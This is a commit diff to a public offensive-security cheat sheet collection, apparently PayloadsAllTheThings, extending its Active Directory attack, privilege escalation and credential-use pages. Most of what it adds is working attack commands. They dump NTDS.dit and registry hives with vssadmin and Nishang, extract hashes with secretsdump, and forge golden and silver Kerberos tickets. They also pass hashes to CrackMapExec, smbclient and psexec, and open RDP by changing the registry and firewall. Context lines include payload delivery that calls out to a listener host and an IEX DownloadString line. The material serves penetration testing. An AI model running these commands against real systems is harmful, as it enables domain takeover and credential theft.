PassTheTicket + OpenShare + Tools(CME example)

Methodology and Resources/Active Directory Attack.md

@@ -4,10 +4,12 @@
 * [Tools](#tools)
 * [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
   * [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
+  * [Open Shares](#open-shares)
   * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
   * [Dumping AD Domain Credentials ](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
-  * [Golden Tickets](#golden-tickets)
-  * [Silver Tickets](#silver-tickets)
+  * [Password in AD User comment](#password-in-ad-user-comment)
+  * [Golden Tickets](#passtheticket-golden-tickets)
+  * [Silver Tickets](#passtheticket-silver-tickets)
   * [Trust Tickets](#trust-tickets)
   * [Kerberoast](#kerberoast)
   * [Pass-the-Hash](#pass-the-hash)
@@ -33,6 +35,7 @@ git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
 crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
 crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
 crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
+crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
 ```
 * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
 ```powershell
@@ -55,6 +58,20 @@ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-
 mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
 ```
 
+## Open Shares
+```powershell
+pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
+ls # list files
+cd 
+get # download files
+put # replace a file
+```
+
+Mount a share
+```powershell
+smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
+```
+
 
 ### GPO - Pivoting with Local Admin & Passwords in SYSVOL
 :triangular_flag_on_post:	 GPO Priorization : Organization Unit > Domain > Site > Local
@@ -106,6 +123,21 @@ vssadmin create shadow /for=C :
 Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
 ```
 
+You can also use the Nishang script, available at : [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
+```powershell
+Import-Module .\Copy-VSS.ps1
+Copy-VSS
+Copy-VSS -DestinationDir C:\ShadowCopy\
+```
+
+**Using vssadmin**
+```powershell
+vssadmin create shadow /for=C:
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
+```
+
+
 **Using DiskShadow (a Windows signed binary)**
 ```powershell
 diskshadow.txt contains :
@@ -118,6 +150,7 @@ delete shadows volume %someAlias%
 reset
 
 then:
+NOTE - must be executed from C:\Windows\System32
 diskshadow.exe /s  c:\diskshadow.txt
 dir c:\exfil
 reg.exe save hklm\system c:\exfil\system.bak
@@ -126,11 +159,12 @@ reg.exe save hklm\system c:\exfil\system.bak
 **Extract hashes from ntds.dit**    
 then you need to use secretsdump to extract the hashes
 ```c
-secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
+secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
 ```
 secretsdump also works remotely
 ```c
-./secretsdump.py IP administrator@domain -use-vss
+./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss
+./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
 ```
 
 
@@ -150,7 +184,7 @@ CrackMapExec module
 cme smb 10.10.0.202 -u username -p password --ntds vss
 ```
 
-## Password in AD User comment
+### Password in AD User comment
 ```powershell
 enum4linux | grep -i desc
 There are 3-4 fields that seem to be common in most AD schemas: 
@@ -158,7 +192,7 @@ UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
 ```
 
 
-### Golden Tickets
+### PassTheTicket Golden Tickets
 Forge a TGT, require krbtgt key
 
 Mimikatz version
@@ -187,11 +221,36 @@ kerberos_ticket_use /root/Downloads/pentestlabuser.tck
 kerberos_ticket_list
 ```
 
-### Silver Tickets
-Forge a TGS, require machine accound password (key) from the KDC
+Using a ticket on Linux
+```powershell
+Convert the ticket kirbi to ccache with kekeo
+misc::convert ccache ticket.kirbi
+
+Alternatively you can use ticketer from Impacket
+./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da
+
+export KRB5CCNAME=/home/user/ticket.ccache
+cat $KRB5CCNAME
+
+
+NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
+./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/administrator@192.168.1.100 
+```
+
+### PassTheTicket Silver Tickets
+Forging a TGS require machine accound password (key) from the KDC
+```powershell
+Create a ticket for the service
+kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
+
+Then use the same steps as a Golden ticket
+misc::convert ccache ticket.kirbi
+export KRB5CCNAME=/home/user/ticket.ccache
+./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/administrator@192.168.1.100 
+```
 
 ### Trust Tickets
-
+TODO
 
 ### Kerberoast
 ```c
@@ -275,6 +334,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
 
 
 ### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
+Check if the patch is installed : `wmic qfe list | find "3139914"`
 ```
 Powershell:
 https://www.exploit-db.com/exploits/39719/
@@ -314,5 +374,6 @@ net group "Domain Admins" hacker2 /add /domain
  * [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
  * [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
  * [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
- *[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
- * [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
+ * [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
+ * [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
+ * [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/)

Methodology and Resources/Windows - Persistence.md

@@ -56,3 +56,4 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D
 
 ## Thanks to
  * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
+ * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)

Methodology and Resources/Windows - Privilege Escalation.md

@@ -92,28 +92,29 @@ net share
 
 ## Looting for passwords
 
-Search for file contents
+### Search for file contents**
 ```powershell
 cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
 ```
 
-Search for a file with a certain filename
+### Search for a file with a certain filename
 ```powershell
 dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
 ```
 
-Search the registry for key names
+### Search the registry for key names
 ```powershell
 REG QUERY HKLM /F "password" /t REG_SZ /S /K
 REG QUERY HKCU /F "password" /t REG_SZ /S /K
 ```
 
-Read a value of a certain sub key
+### Read a value of a certain sub key
 ```powershell
 REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
 ```
 
-Password in unattend.xml
+### Password in unattend.xml
+Location of the unattend.xml files
 ```powershell
 C:\unattend.xml
 C:\Windows\Panther\Unattend.xml
@@ -121,6 +122,8 @@ C:\Windows\Panther\Unattend\Unattend.xml
 C:\Windows\system32\sysprep.inf
 C:\Windows\system32\sysprep\sysprep.xml
 ```
+
+Example content
 ```powershell
    <component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
     <AutoLogon>
@@ -182,4 +185,6 @@ powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadS
 ## Thanks to
 * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
 * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
-* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
+* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
+* [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
+* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)

Methodology and Resources/Windows - Using credentials.md

@@ -68,16 +68,20 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
 ```
 
 ## RDP Remote Desktop Protocol (Impacket)
-```
+```powershell
 python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
 rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5
 ```
+
 Note: you may need to enable it with the following command
-```
+```powershell
 reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
+netsh firewall set service remoteadmin enable
+netsh firewall set service remotedesktop enable
 ```
+
 or with psexec(sysinternals)
-```
+```powershell
 psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
 ```
 
@@ -86,6 +90,12 @@ For Server 2012 R2, Win8.1+
 xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
 ```
 
+with Metasploit
+```powershell
+run getgui -u admin -p 1234
+```
+
+
 ## Netuse (Windows)
 ```
 net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r

README.md

@@ -1,7 +1,7 @@
 # Payloads All The Things 
 A list of useful payloads and bypasses for Web Application Security.
 Feel free to improve with your payloads and techniques !
-I <3 pull requests :) You can also contribute with a beer IRL or a [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
+I <3 pull requests :) You can also contribute with a beer IRL or [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
 
 Every section contains:
   - README.md - vulnerability description and how to exploit it